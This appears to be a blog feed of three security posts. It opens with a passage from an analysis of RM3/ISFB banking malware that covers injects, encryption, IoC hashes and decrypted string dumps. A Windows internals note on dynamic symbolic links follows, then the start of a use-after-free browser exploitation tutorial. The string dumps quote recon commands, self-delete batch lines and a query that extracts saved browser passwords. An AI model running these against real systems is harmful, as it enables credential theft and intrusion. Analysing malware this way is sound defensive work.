An overview of standard stealing feature developed by RM3

It’s worth noting that the mail module is an underrated feature that can provide a huge amount of information to a TA:

  • Many users store nearly everything in their email (including passwords and sensitive documents)
  • Mails can be stolen and resold to spammers for crafting legitimate mails with malicious attachments/links

Stealing/intercepting HTTP and HTTPS communication

RM3 implements an SSL Proxy and so is really effective at intercepting POST requests performed by the user. All of them are stored and sent every X minutes to the controllers.

RM3 browser module initializing the SSL proxy interception
RM3 SSL Proxy running on MsEdge

Whenever the user visits a website, part of the inject config will automatically replace strings or variables in the code (‘base’) with the new content (‘new_var’); this often includes a URL path from an inject C&C.

As if that wasn’t complicated enough, most of them are geofencedand it could be possible they manually allow the bot to get them (especially with the elite one). Indeed, this is another trick for avoiding analysts and researchers to get and report those scripts  that cost millions to financial companies.

A typical inject entry in config.bin

A parser then modifies the variable ‘@ID@ and ‘@GROUP@’ to the correct values as stored in RM3_Struct and other structures relevant to the browsers.dll module.

Browser inject module parsing config.bin and replacing with respective botid and groupid

System information gathering

Gathering system information is simple with RM3:

  • Manually (using a specific RUN_CMD command)
  • Requesting info from a bot with GET_SYSINFO

Indeed, GET_SYSINFO is known and regularly used by ISFB actors (both active strains)

systeminfo.exe
driverquery.exe
net view
nslookup 127.0.0.1
whoami /all
net localgroup administrators
net group "domain computers" /domain

TAs in general are spending a lot of time (or are literally paying people) to inspect bots for the stolen data they have gathered. In this regard, bots can be split into one of the following groups:

  • Home bots (personal accounts)
  • Researcher bots
  • Corporate bots (compromised host from a company)

Over the past 6 months, ISFB v2 has been seen to be extremely active in term of updates. One purpose of these updates has been to help TAs filter their bots from the loader side directly and more easily. This filtering is not a new thing at all, but it is probably of more interest (and could have a greater impact) for malicious operations these days. 

Microsoft Edge (Chromium) joining the targeted browser list

One critical aspect of any banking malware is the ability to hook into a browser so as to inject fakes and replacers in financial institution websites.

At the same time as the Task.key implementation, RM3 decided to implement a new browser in its targeted list: “MsEdge”. This was not random, but was a development choice driven by the sheer number of corporate computers migrating from Internet Explorer to Edge.

RM3 MsEdge startup module

This means that 5 browsers are currently targeted:

  • Internet Explorer
  • Microsoft Edge (Original)
  • Microsoft Edge (Chromium)
  • Mozilla Firefox
  • Google Chrome

Currently, RM3 doesn’t seem to interact with Opera. Given Opera’s low user share and almost non-existent corporate presence, it is not expected that the development of a new module/feature for Opera would have an ROI that was sufficiently attractive to the TAs and RM3 developers. Any development and debugging would be time consuming and could delay useful updates to existing modules already producing a reliable return.

RM3 and its homemade forked SQLITE module

A lot of this blogpost has been dedicated to discussing the innovative design and features in RM3. But perhaps the best example of the attention to detail displayed in the design and development of this malware is the custom SQLITE3 module that is included with RM3. Presumably driven by the need to extract credentials data from browsers (and related tasks), they have forked the original SQLite3 source code and refactored it to work in RM3.

Using SQLite is not a new thing, of course, as it was already noted in the ISFB leak.

Interestingly, the RM3 build is based on the original 3.8.6 build and has all the features and functions of the original version.

Because the background loader (bl.dll) is the only module within RM3 technically capable of performing allocation operations, they have simply integrated “free”, “malloc”, and “realloc” API calls with this backbone module.

What’s new with Build 300960?

Goodbye Serpent, Hello AES!

Around mid-march, RM3 pushed a major update by replacing the Serpent encryption with the good old AES 128 CBC. All locations where Serpent encryption was used, have been totally reworked so as to work with AES.

AES 128 CBC implementation in RM3

RM3 C&C response also reviewed

Before build 300960, RM3 treated data received from controllers as described below. Information was split into two encrypted parts (a header and a body) which are treated differently:

  1. The encrypted head was decrypted with the public RSA key extracted from modules, to extract a Serpent key
  2. This Serpent key was then used to decrypt the encrypted data in the body (this is a different key from client.ini and loader.ini).

This was the setup before build 300960:

Now, in the recently released 300960 build, with Serpent removed and AES implemented instead, the structure of the encrypted header has changed as indicated below:

The decrypted body data produced by this process is not in an entirely standard format. In fact, it’s compressed with the APlib library. But removing the first 0x14 bytes (or sometimes 0x4 bytes) and decompressing it, ensures that the final block is ready for analysis.

  • If it’s a DLL, it will be recognised with the PX format
  • If it’s web injects, it’s an archive that contains .sig files (that is, MAIN.SIG†)
  • If it’s tasks or config updates, these are in a classic raw ISFB config format

† SIG can probably be taken to mean ‘signature’

Changes in .ini files

Two fields have been added in the latest campaigns. Interestingly, these are not new RM3 features but old ones that have been present for quite some time.

{
    "SENDFGKEY": "0",    // Send Foreground Key
    "SUBDOMAINS": "0",   
}

Appendix

IoCs – Campaign

00cd7319a42bbabd0c81a7e9817d2d5071738d5ac36b98b8ff9d7383c3d7e1ba - DE
a7007821b1acbf36ca18cb2ec7d36f388953fe8985589f170be5117548a55c57 - Italy
5ee51dfd1eb41cb6ce8451424540c817dbd804f103229f3ae1b645b320cbb4e8 - Australia/NZ 1
c7552fe5ed044011aa09aebd5769b2b9f3df0faa8adaab42ef3bfff35f5190aa - Australia/NZ 2
261c6f7b7e9d8fc808a4a9db587294202872b2a816b2b98516551949165486c8 - UK 1
2e0b219c5ac3285a08e126f11c07ea3ac60bc96d16d37c2dc24dd8f68c492a74 - UK 2
6818b6b32cb91754fd625e9416e1bc83caac1927148daaa3edaed51a9d04e864 - Worldwide ?

86b670d81a26ea394f7c0edebdc93e8f9bd6ce6e0a8d650e32a0fe36c93f0dee - GoziAT/ISFB RM2

IoCs – Modules

b15c3b93f8de40b745eb1c1df5dcdee3371ba08a1a124c7f20897f87f23bcd55  loader.exe (Build 300932)
ce4fc5dcab919ea40e7915646a3ce345a39a3f81c33758f1ba9c1eae577a5c35  loader.dll (Build 300932)

ba0e9cb3bf25516e2c1f0288e988bd7bd538d275373d36cee28c34dafa7bbd1f  explorer.dll (Build 300932)
accb76e6190358760044d4708e214e546f87b1e644f7e411ba1a67900bcd32a1  bl.dll (Build 300932)
f90ed3d7c437673c3cfa3db8e6fbb3370584914def2c0c2ce1f11f90f199fb4f  ntwrk.dll (Build 300932)
38c9aff9736eae6db5b0d9456ad13d1632b134d654c037fba43086b5816acd58  rt.dll (Build 300932)

2c7cdcf0f9c2930096a561ac6f9c353388a06c339f27f70696d0006687acad5b  browser.dll (Build 300932)
34517a7c78dd66326d0d8fbb2d1524592bbbedb8ed6b595281f7bb3d6a39bc0a  chrome.dll (Build 300932)
59670730341477b0a254ddbfc10df6f1fcd3471a08c0d8ec20e1aa0c560ddee4  firefox.dll (Build 300932)
d927f8793f537b94c6d2299f86fe36e3f751c94edca5cd3ddcdbd65d9143b2b6  iexplorer.dll (Build 300932)
199caec535d640c400d3c6b35806c74912b832ff78cb31fd90fe4712ed194b09  microsoftedgecp.dll (Build 300932)
13635b2582a11e658ab0b959611590005b81178365c12062e77274db1d0b4f0c  msedge.dll (Build 300932)

65a1923e037bce4816ac2654c242921f3e3592e972495945849f155ca69c05e5  loader.dll (Build 300960)

d1f5ef94e14488bf909057e4a0d081ff18dd0ac86f53c42f53b12ea25cdcfe76  cmdshell.dll (Build 300869)
820faca1f9e6e291240e97e5768030e1574b60862d5fce7f6ba519aaa3dbe880  vnc.dll (Build 300869)

Shellcode – startup module – bss decrypted

Windows Security
NTDLL.DLL
RtlExitUserProcess
KERNEL32.DLL
bl.dll - bss decrypted
Microsoft Windows
KERNEL32.DLL
ADVAPI32.DLL
NTDLL.DLL
KERNELBASE
USER32
LdrUnregisterDllNotification
ResolveDelayLoadsFromDll
Software
Wow64EnableWow64FsRedirection
\REGISTRY\USER\%s\%s\
{%08X-%04X-%04X-%04X-%08X%04X}
SetThreadInformation
GetWindowThreadProcessId
%08X-%04X-%04X-%04X-%08X%04X
RtlExitUserThread
S-%u-%u
-%u
Local\
\\.\pipe\
%05u
LdrRegisterDllNotification
NtClose
ZwProtectVirtualMemory
LdrGetProcedureAddress
WaitNamedPipeW
CallNamedPipeW
LdrLoadDll
NtCreateUserProcess
.dll
%08x
GetShellWindow
\KnownDlls\ntdll.dll
%systemroot%\system32\c_1252.NLS
\??\
\\?\

explorer.dll – bss decrypted

indows Security
.jpeg
Main
.gif
.bmp
%APPDATA%\Microsoft\
tasklist.exe /SVC
\Microsoft\Windows\
cmd /C "%s" >> %S0
systeminfo.exe
driverquery.exe
net view
nslookup 127.0.0.1
whoami /all
net localgroup administrators
net group "domain computers" /domain
reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
cmd /U /C "type %S0 > %S & del %S0"
echo -------- %u
KERNELBASE
.exe
RegGetValueW
0x%S
.DLL
DllRegisterServer
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Serialize
0x%X,%c%c
Startupdelayinmsec
ICGetInfo
SOFTWARE\Classes\Chrome
DelegateExecute
\\?\
%userprofile%\appdata\local\google\chrome\user data\default\cache
\Software\Microsoft\Windows\CurrentVersion\Run
http\shell\open\command
ICSendMessage
%08x
 | "%s" | %u
msvfw32
ICOpen
ICClose
ICInfo
main
%userprofile%\AppData\Local\Mozilla\Firefox\Profiles
.avi
https://
Video: sec=%u, fps=%u, q=%u
Local\
%userprofile%\appdata\local\microsoft\edge\user data\default\cache
MiniDumpWriteDump
cache2\entries\*.*
%PROGRAMFILES%\Mozilla Firefox
%USERPROFILE%\AppData\Roaming\Mozilla\Firefox\Profiles\*.default*
Software\Classes\CLSID\%s\InProcServer32
open
http://
file://
DBGHELP.DLL
%temp%\rm3.dmp
%u, 0x%x, "%S"
"%S", 0x%p, 0x%x
%APPDATA%
SOFTWARE\Microsoft\Windows NT\CurrentVersion
InstallDate

rt.dll – bss decrypted

Windows Security
%s%02u:%02u:%02u 
:%u
attrib -h -r -s %%1
del %%1
if exist %%1 goto %u
del %%0
Low\
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
|$$$}rstuvwxyz{$$$$$$$>?@ABCDEFGHIJKLMNOPQRSTUVW$$$$$$XYZ[\]^_`abcdefghijklmnopq
*.*
.bin
open
%02u-%02u-%02u %02u:%02u:%02u
*.dll
%systemroot%\system32\c_1252.NLS
rundll32 "%s",%S %s
"%s"
cmd /C regsvr32 "%s"
Mb=Lk
Author
n;
QkkXa
M<q

netwrk.dll – bss decrypted

&WP
POST
Host
%04x%04x
GET
Windows Security
Content-Type: multipart/form-data; boundary=%s
Content-Type: application/octet-stream
--%s
--%s--
%c%02X
https://
http://
%08x%08x%08x%08x
form
%s=%s&
/images/
.bmp
file://
type=%u&soft=%u&version=%u&user=%08x%08x%08x%08x&group=%u&id=%08x&arc=%u&crc=%08x&size=%u&uptime=%u
index.html
Content-Disposition: form-data; name="%s"
; filename="%s"
&os=%u.%u_%u_%u_x%u
&ip=%s
Mozilla/5.0 (Windows NT %u.%u%s; Trident/7.0; rv:11.0) like Gecko
; Win64; x64
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
%08x
|$$$}rstuvwxyz{$$$$$$$>?@ABCDEFGHIJKLMNOPQRSTUVW$$$$$$XYZ[\]^_`abcdefghijklmnopq
F%D,3
overridelink
invalidcert
9*.onion
&sysid=%08x%08x%08x%08x

browser.dll – bss decrypted

%c%02X
.php
Windows Security
1.3.6.1.5.5.7.3.2
1.3.6.1.5.5.7.3.1
2.5.29.15
2.5.29.37
2.5.29.1
2.5.29.35
2.5.29.14
2.5.29.10
2.5.29.19
1.3.6.1.5.5.7.1.1
2.5.29.32
1.3.6.1.5.5.7.1.11
1.3.6.1.5.5.7
1.3.6.1.5.5.7.1
2.5.29.31
1.2.840.113549.1.1.11
1.2.840.113549.1.1.5
WS2_32.dll
iexplore.hlp
ConnectEx
Local\
WSOCK32.DLL
WININET.DLL
CRYPT32.DLL
socket
connect
closesocket
getpeername
WSAStartup
WSACleanup
WSAIoctl
User-Agent
Content-Type
Content-Length
Connection
Content-Security-Policy
Content-Security-Policy-Report-Only
X-Frame-Options
Access-Control-Allow-Origin
chunked
WebSocket
Transfer-Encoding
Content-Encoding
Accept-Encoding
Accept-Language
Cookie
identity
gzip, deflate
gzip
Host
://
HTTP/1.1 404 Not Found
Content-Length: 0
://
HTTP/1.1 503 Service Unavailable
Content-Length: 0
http://
https://
Referer
Upgrade
Cache-Control
Last-Modified
Etag
no-cache, no-store, must-revalidate
ocsp
TEXT HTML JSON JAVASCRIPT
SECUR32.DLL
SECURITY.DLL
InitSecurityInterfaceW
BUNNY
SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL
SendTrustedIssuerList
@ID@
URL=
Main
@RANDSTR@
Blocked
@GROUP@
BLOCKCFG=
LOADCFG=
DELCFG=
VIDEO=
VNC=
SOCKS=
CFGON=
CFGOFF=
ENCRYPT=
http
@%s@
http
grabs=
POST
PUT
GET
HEAD
OPTIONS
URL: %s
REF: %s
LANG: %s
AGENT: %s
COOKIE: %s
POST: 
USER: %s
USERID: %s
@*@
***
IE:
:Microsoft Unified Security Protocol Provider
FF:
CR:
ED:
iexplore
firefox
chrome
edge
InitRecv %u, %s%s
CompleteRecv %u, %s%s
LoadUrl %u, %s
NEWGRAB
CertGetCertificateChain
CertVerifyCertificateChainPolicy
NSS_Init
NSS_Shutdown
nss3.dll
PK11_GetInternalKeySlot
PK11_FreeSlot
PK11_Authenticate
PK11SDR_Decrypt
hostname
vaultcli
%PROGRAMFILES%\Mozilla Thunderbird
encryptedUsername
%USERPROFILE%\AppData\Roaming\Thunderbird\Profiles\*.default
encryptedPassword
logins.json
%systemroot%\syswow64\svchost.exe
Software\Microsoft\Internet Explorer\IntelliForms\Storage2
FindCloseUrlCache
VaultEnumerateItems
type=%s, name=%s, address=%s, server=%s, port=%u, ssl=%s, user=%s, password=%s
FindNextUrlCacheEntryW
FindFirstUrlCacheEntryW
DeleteUrlCacheEntryW
VaultEnumerateVaults
VaultOpenVault
VaultCloseVault
VaultFree
VaultGetItem
c:\test\sqlite3.dll
SELECT origin_url, username_value, password_value FROM logins
encrypted_key":"
default\login data
BCryptSetProperty
%userprofile%\appdata\local\google\chrome\user data
local state
DPAPI
v10
BCryptDecrypt
AES
Microsoft Primitive Provider
BCryptDestroyKey
BCryptCloseAlgorithmProvider
ChainingModeGCM
BCryptOpenAlgorithmProvider
BCryptGenerateSymmetricKey
BCRYPT
%userprofile%\appData\local\microsoft\edge\user data

Dynamic Symbolic Links

30 April 2021 at 15:00

While teaching a Windows Internals class recently, I came across a situation which looked like a bug to me, but turned out to be something I didn’t know about – dynamic symbolic links.

Symbolic links are Windows kernel objects that point to another object. The weird situation in question was when running WinObj from Sysinternals and navigating to the KenrelObjects object manager directory.

WinObj from Sysinternals

You’ll notice some symbolic link objects that look weird: MemoryErrors, PhysicalMemoryChange, HighMemoryCondition, LowMemoryCondition and a few others. The weird thing that is fairly obvious is that these symbolic link objects have empty targets. Double-clicking any one of them confirms no target, and also shows a curious zero handles, as well as quota change of zero:

Symbolic link properties

To add to the confusion, searching for any of them with Process Explorer yields something like this:

It seems these objects are events, and not symbolic links!

My first instinct was that there is a bug in WinObj (I rewrote it recently for Sysinternals, so was certain I introduced a bug). I ran an old WinObj version, but the result was the same. I tried other tools with similar functionality, and still got the same results. Maybe a bug in Process Explorer? Let’s see in the kernel debugger:

lkd> !object 0xFFFF988110EC0C20
Object: ffff988110ec0c20  Type: (ffff988110efb400) Event
    ObjectHeader: ffff988110ec0bf0 (new version)
    HandleCount: 4  PointerCount: 117418
    Directory Object: ffff828b10689530  Name: HighCommitCondition

Definitely an event and not a symbolic link. What’s going on? I debugged it in WinObj, and indeed the reported object type is a symbolic link. Maybe it’s a bug in the NtQueryDirectoryObject used to query a directory object for an object.

I asked Mark Russinovich, could there be a bug in Windows? Mark remembered that this is not a bug, but a feature of symbolic links, where objects can be created/resolved dynamically when accessing the symbolic link. Let’s see if we can see something in the debugger:

lkd> !object \kernelobjects\highmemorycondition
Object: ffff828b10659510  Type: (ffff988110e9ba60) SymbolicLink
    ObjectHeader: ffff828b106594e0 (new version)
    HandleCount: 0  PointerCount: 1
    Directory Object: ffff828b10656ce0  Name: HighMemoryCondition
    Flags: 0x000010 ( Local )
    Target String is '*** target string unavailable ***'

Clearly, there is target, but notice the flags value 0x10. This is the flag indicating the symbolic link is a dynamic one. To get further information, we need to look at the object with a “symbolic link lenses” by using the data structure the kernel uses to represent symbolic links:

lkd> dt nt!_OBJECT_SYMBOLIC_LINK ffff828b10659510

   +0x000 CreationTime     : _LARGE_INTEGER 0x01d73d87`21bd21e5
   +0x008 LinkTarget       : _UNICODE_STRING "--- memory read error at address 0x00000000`00000005 ---"
   +0x008 Callback         : 0xfffff802`08512250     long  nt!MiResolveMemoryEvent+0

   +0x010 CallbackContext  : 0x00000000`00000005 Void
   +0x018 DosDeviceDriveIndex : 0
   +0x01c Flags            : 0x10
   +0x020 AccessMask       : 0x24

The Callback member shows the function that is being called (MiResolveMemoryEvent) that “resolves” the symbolic link to the relevant event. There are currently 11 such events, their names visible with the following:

lkd> dx (nt!_UNICODE_STRING*)&nt!MiMemoryEventNames,11
(nt!_UNICODE_STRING*)&nt!MiMemoryEventNames,11                 : 0xfffff80207e02e90 [Type: _UNICODE_STRING *]
    [0]              : "\KernelObjects\LowPagedPoolCondition" [Type: _UNICODE_STRING]
    [1]              : "\KernelObjects\HighPagedPoolCondition" [Type: _UNICODE_STRING]
    [2]              : "\KernelObjects\LowNonPagedPoolCondition" [Type: _UNICODE_STRING]
    [3]              : "\KernelObjects\HighNonPagedPoolCondition" [Type: _UNICODE_STRING]
    [4]              : "\KernelObjects\LowMemoryCondition" [Type: _UNICODE_STRING]
    [5]              : "\KernelObjects\HighMemoryCondition" [Type: _UNICODE_STRING]
    [6]              : "\KernelObjects\LowCommitCondition" [Type: _UNICODE_STRING]
    [7]              : "\KernelObjects\HighCommitCondition" [Type: _UNICODE_STRING]
    [8]              : "\KernelObjects\MaximumCommitCondition" [Type: _UNICODE_STRING]
    [9]              : "\KernelObjects\MemoryErrors" [Type: _UNICODE_STRING]
    [10]             : "\KernelObjects\PhysicalMemoryChange" [Type: _UNICODE_STRING]

Creating dynamic symbolic links is only possible from kernel mode, of course, and is undocumented anyway.

At least the conundrum is solved.

image

zodiacon

Exploit Development: Browser Exploitation on Windows - Understanding Use-After-Free Vulnerabilities

21 April 2021 at 00:00

Introduction

Browser exploitation is a topic that has been incredibly daunting for myself. Looking back at my journey over the past year and a half or so since I started to dive into binary exploitation, specifically on Windows, I remember experiencing this same feeling with kernel exploitation. I can still remember one day just waking up and realizing that I just need to just dive into it if I ever wanted to advance my knowledge. Looking back, although I still have tons to learn about it and am still a novice at kernel exploitation, I realized it was my will to just jump in, irrespective of the difficulty level, that helped me to eventually grasp some of the concepts surrounding more modern kernel exploitation.

Browser exploitation has always been another fear of mine, even more so than the Windows kernel, due to the fact not only do you need to understand overarching exploit primitives and vulnerability classes that are specific to Windows, but also needing to understand other topics such as the different JavaScript engines, just-in-time (JIT) compilers, and a plethora of other subjects, which by themselves are difficult (at least to me) to understand. Plus, the addition of browser specific mitigations is also something that has been a determining factor in myself putting off learning this subject.

What has always been frightening, is the lack (in my estimation) of resources surrounding browser exploitation on Windows. Many people can just dissect a piece of code and come up with a working exploit within a few hours. This is not the case for myself. The way I learn is to take a POC, along with an accompanying blog, and walk through the code in a debugger. From there I analyze everything that is going on and try to ask myself the question “Why did the author feel it was important to mention X concept or show Y snippet of code?”, and to also attempt to answer that question. In addition to that, I try to first arm myself with the prerequisite knowledge to even begin the exploitation process (e.g. “The author mentioned this is a result of a fake virtual function table. What is a virtual function table in the first place?”). This helps me to understand the underlying concepts. From there, I am able to take other POCs that leverage the same vulnerability classes and weaponize them - but it takes that first initial walkthrough for myself.

Since this is my learning style, I have found that blogs on Windows browser exploitation which start from the beginning are very sparse. Since I use blogging as a mechanism not only to share what I know, but to reinforce the concepts I am attempting to hit home, I thought I would take a few months, now with Advanced Windows Exploitation (AWE) being canceled again for 2021, to research browser exploitation on Windows and to talk about it.

Please note that what is going to be demonstrated here, is not heap spraying as an execution method. These will be actual vulnerabilities that are exploited. However, it should also be noted that this will start out on Internet Explorer 8, on Windows 7 x86. We will still outline leveraging code-reuse techniques to bypass DEP, but don’t expect MemGC, Delay Free, etc. to be enabled for this tutorial, and most likely for the next few. This will simply be a documentation of my thought process, should you care, of how I went from crash to vulnerability identification, and hopefully to a shell in the end.

Understanding Use-After-Free Vulnerabilities

As was aforesaid above, the vulnerability we will be taking a look at is a use-after-free. More specifically, MS13-055, which is titled as Microsoft Internet Explorer CAnchorElement Use-After-Free. What exactly does this mean? Use-after-free vulnerabilities are well documented, and fairly common. There are great explanations out there, but for brevity and completeness sake I will take a swing at explaining them. Essentially what happens is this - a chunk of memory (chunks are just contiguous pieces of memory, like a buffer. Each piece of memory, known as a block, on x86 systems are 0x8 bytes, or 2 DWORDS. Don’t over-think them) is allocated by the heap manager (on Windows there is the front-end allocator, known as the Low-Fragmentation Heap, and the standard back-end allocator. We will talk about these in the a future section). At some point during the program’s lifetime, this chunk of memory, which was previously allocated, is “freed”, meaning the allocation is cleaned up and can be re-used by the heap manager again to service allocation requests.

Let’s say the allocation was at the memory address 0x15000. Let’s say the chunk, when it was allocated, contained 0x40 bytes of 0x41 characters. If we dereferenced the address 0x15000, you could expect to see 0x41s (this is psuedo-speak and should just be taken at a high level for now). When this allocation is freed, if you go back and dereference the address again, you could expect to see invalid memory (e.g. something like ???? in WinDbg), if the address hasn’t been used to service any allocation requests, and is still in a free state.

Where the vulnerability comes in is the chunk, which was allocated but is now freed, is still referenced/leveraged by the program, although in a “free” state. This usually causes a crash, as the program is attempting to either access and/or dereference memory that simply isn’t valid anymore. This usually causes some sort of exception, resulting in a program crash.

Now that the definition of what we are attempting to take advantage of is out of the way, let’s talk about how this condition arises in our specific case.

C++ Classes, Constructors, Destructors, and Virtual Functions

You may or may not know that browsers, although they interpret/execute JavaScript, are actually written in C++. Due to this, they adhere to C++ nomenclature, such as implementation of classes, virtual functions, etc. Let’s start with the basics and talk about some foundational C++ concepts.

A class in C++ is very similar to a typical struct you may see in C. The difference is, however, in classes you can define a stricter scope as to where the members of the class can be accessed, with keywords such as private or public. By default, members of classes are private, meaning the members can only be accessed by the class and by inherited classes. We will talk about these concepts in a second. Let’s give a quick code example.

#include <iostream>
using namespace std;

// This is the main class (base class)
class classOne
{
  public:

    // This is our user defined constructor
    classOne()
    {
      cout << "Hello from the classOne constructor" << endl;
    }

    // This is our user defined destructor
    ~classOne()
    {
      cout << "Hello from the classOne destructor!" << endl;
    }

  public:
    virtual void sharedFunction(){};        // Prototype a virtual function
    virtual void sharedFunction1(){};       // Prototype a virtual function
};

// This is a derived/sub class
class classTwo : public classOne
{
  public:

    // This is our user defined constructor
    classTwo()
    {
      cout << "Hello from the classTwo constructor!" << endl;
    };

    // This is our user defined destructor
    ~classTwo()
    {
      cout << "Hello from the classTwo destructor!" << endl;
    };

  public:
    void sharedFunction()               
    {
      cout << "Hello from the classTwo sharedFunction()!" << endl;    // Create A DIFFERENT function definition of sharedFunction()
    };

    void sharedFunction1()
    {
      cout << "Hello from the classTwo sharedFunction1()!" << endl;   // Create A DIFFERENT function definition of sharedFunction1()
    };
};

// This is another derived/sub class
class classThree : public classOne
{
  public:

    // This is our user defined constructor
    classThree()
    {
      cout << "Hello from the classThree constructor" << endl;
    };

    // This is our user defined destructor
    ~classThree()
    {
      cout << "Hello from the classThree destructor!" << endl;
    };
  
  public:
    void sharedFunction()
    {
      cout << "Hello from the classThree sharedFunction()!" << endl;  // Create A DIFFERENT definition of sharedFunction()
    };

    void sharedFunction1()
    {
      cout << "Hello from the classThree sharedFunction1()!" << endl;   // Create A DIFFERENT definition of sharedFunction1()
    };
};

// Main function
int main()
{
  // Create an instance of the base/main class and set it to one of the derivative classes
  // Since classTwo and classThree are sub classes, they inherit everything classOne prototypes/defines, so it is acceptable to set the address of a classOne object to a classTwo object
  // The class 1 constructor will get called twice (for each classOne object created), and the classTwo + classThree constructors are called once each (total of 4)
  classOne* c1 = new classTwo;
  classOne* c1_2 = new classThree;

  // Invoke the virtual functions
  c1->sharedFunction();
  c1_2->sharedFunction();
  c1->sharedFunction1();
  c1_2->sharedFunction1();

  // Destructors are called when the object is explicitly destroyed with delete
  delete c1;
  delete c1_2;
}

The above code creates three classes: one “main”, or “base” class (classOne) and then two classes which are “derivative”, or “sub” classes of the base class classOne. (classTwo and classThree are the derivative classes in this case).

Each of the three classes has a constructor and a destructor. A constructor is named the same as the class, as is proper nomenclature. So, for instance, a constructor for class classOne is classOne(). Constructors are essentially methods that are called when an object is created. Its general purpose is that they are used so that variables can be initialized within a class, whenever a class object is created. Just like creating an object for a structure, creating a class object is done as such: classOne c1. In our case, we are creating objects that point to a classOne class, which is essentially the same thing, but instead of accessing members directly, we access them via pointers. Essentially, just know that whenever a class object is created (classOne* cl in our case), the constructor is called when creating this object.

In addition to each constructor, each class also has a destructor. A destructor is named ~nameoftheClass(). A destructor is something that is called whenever the class object, in our case, is about to go out of scope. This could be either code reaching the end of execution or, as is in our case, the delete operator is invoked against one of the previously declared class objects (cl and cl_2). The destructor is the inverse of the constructor - meaning it is called whenever the object is being deleted. Note that a destructor does not have a type, does not accept function arguments, and does not return a value.

In addition to the constructor and destructor, we can see that classOne prototypes two “virtual functions”, with empty definitions. Per Microsoft’s documentation, a virtual function is “A member function that you expect to be redefined in a derived class”. If you are not innately familiar with C++, as I am not, you may be wondering what a member function is. A member function, simply put, is just a function that is defined in a class, as a member. Here is an example struct you would typically see in C:

struct mystruct{
  int var1;
  int var2;
}

As you know, the first member of this struct is int var1. The same bodes true with C++ classes. A function that is defined in a class is also a member, hence the term “member function”.

The reason virtual functions exists, is it allows a developer to prototype a function in a main class, but allows for the developer to redefine the function in a derivative class. This works because the derivative class can inherit all of the variables, functions, etc. from its “parent” class. This can be seen in the above code snippet, placed here for brevity: classOne* c1 = new classTwo;. This takes a derivative class of classOne, which is classTwo, and points the classOne object (c1) to the derivative class. It ensures that whenever an object (e.g. c1) calls a function, it is the correctly defined function for that class. So basically think of it as a function that is declared in the main class, is inherited by a sub class, and each sub class that inherits it is allowed to change what the function does. Then, whenever a class object calls the virtual function, the corresponding function definition, appropriate to the class object invoking it, is called.

Running the program, we can see we acquire the expected result:

Now that we have armed ourselves with a basic understanding of some key concepts, mainly constructors, destructors, and virtual functions, let’s take a look at the assembly code of how a virtual function is fetched.

Note that it is not necessary to replicate these steps, as long as you are following along. However, if you would like to follow step-by-step, the name of this .exe is virtualfunctions.exe. This code was compiled with Visual Studio as an “Empty C++ Project”. We are building the solution in Debug mode. Additionally, you’ll want to open up your code in Visual Studio. Make sure the program is set to x64, which can be done by selecting the drop down box next to Local Windows Debugger at the top of Visual Studio.

Before compiling, select Project > nameofyourproject Properties. From here, click C/C++ and click on All Options. For the Debug Information Format option, change the option to Program Database /Zi.

After you have completed this, follow these instructions from Microsoft on how to set the linker to generate all the debug information that is possible.

Now, build the solution and then fire up WinDbg. Open the .exe in WinDbg (note you are not attaching, but opening the binary) and execute the following command in the WinDbg command window: .symfix. This will automatically configure debugging symbols properly for you, allowing you to resolve function names not only in virtualfunctions.exe, but also in Windows DLLs. Then, execute the .reload command to refresh your symbols.

After you have done this, save the current workspace with File > Save Workspace. This will save your symbol resolution configuration.

For the purposes of this vulnerability, we are mostly interested the virtual function table. With that in mind, let’s set a breakpoint on the main function with the WinDbg command bp virtualfunctions!main. Since we have the source file at our disposal, WinDbg will automatically generate a View window with the actual C code, and will walk through the code as you step through it.

In WinDbg, step through the code with t to until we hit c1->sharedFunction().

After reaching the beginning of the virtual function call, let’s set breakpoints on the next three instructions after the instruction in RIP. To do this, leverage bp 00007ff7b67c1703, etc.

Stepping into the next instruction, we can see that the value pointed to by RAX is going to be moved into RAX. This value, according to WinDbg, is virtualfunctions!classTwo::vftable.

As we can see, this address is a pointer to the “vftable” (a virtual function table pointer, or vptr). A vftable is a virtual function table, and it essentially is a structure of pointers to different virtual functions. Recall earlier how we said “when a class calls a virtual function, the program will know which function corresponds to each class object”. This is that process in action. Let’s take a look at the current instruction, plus the next two.

You may not be able to tell it now, but this sort of routine (e.g. mov reg, [ptr] + call [ptr]) is indicative of a specific virtual function being fetched from the virtual function table. Let’s walk through now to see how this is working. Stepping through the call, the vptr (which is a pointer to the table), is loaded into RAX. Let’s take a look at this table now.

Although these symbols are a bit confusing, notice how we have two pointers here - one is ?sharedFunctionclassTwo and the other is ?sharedFunction1classTwo. These are actually pointers to the two virtual functions within classTwo!

If we step into the call, we can see this is a call that redirects to a jump to the sharedFunction virtual function defined in classTwo!

Next, keep stepping into instructions in the debugger, until we hit the c1->sharedFunction1() instruction. Notice as you are stepping, you will eventually see the same type of routine done with sharedFunction within classThree.

Again, we can see the same type of behavior, only this time the call instruction is call qword ptr [rax+0x8]. This is because of the way virtual functions are fetched from the table. The expertly crafted Microsoft Paint chart below outlines how the program indexes the table, when there are multiple virtual functions, like in our program.

As we recall from a few images ago, where we dumped the table and saw our two virtual function addresses. We can see that this time program execution is going to invoke this table at an offset of 0x8, which is a pointer to sharedFunction1 instead of sharedFunction this time!

Stepping through the instruction, we hit sharedFunction1.

After all of the virtual functions have executed, our destructor will be called. Since we only created two classOne objects, and we are only deleting those two objects, we know that only the classOne destructor will be called, which is evident by searching for the term “destructor” in IDA. We can see that the j_operator_delete function will be called, which is just a long and drawn out jump thunk to the UCRTBASED Windows API function _free_dbg, to destroy the object. Note that this would normally be a call to the C Runtime function free, but since we built this program in debug mode, it defaults to the debug version.

Great! We now know how C++ classes index virtual function tables to retrieve virtual functions associated with a given class object. Why is this important? Recall this will be a browser exploit, and browsers are written in C++! These class objects, which almost certainly will use virtual functions, are allocated on the heap! This is very useful to us.

Before we move on to our exploitation path, let’s take just a few extra minutes to show what a use-after-free potentially looks like, programmatically. Let’s add the following snippet of code to the main function:

// Main function
int main()
{
  classOne* c1 = new classTwo;
  classOne* c1_2 = new classThree;

  c1->sharedFunction();
  c1_2->sharedFunction();

  delete c1;
  delete c1_2;

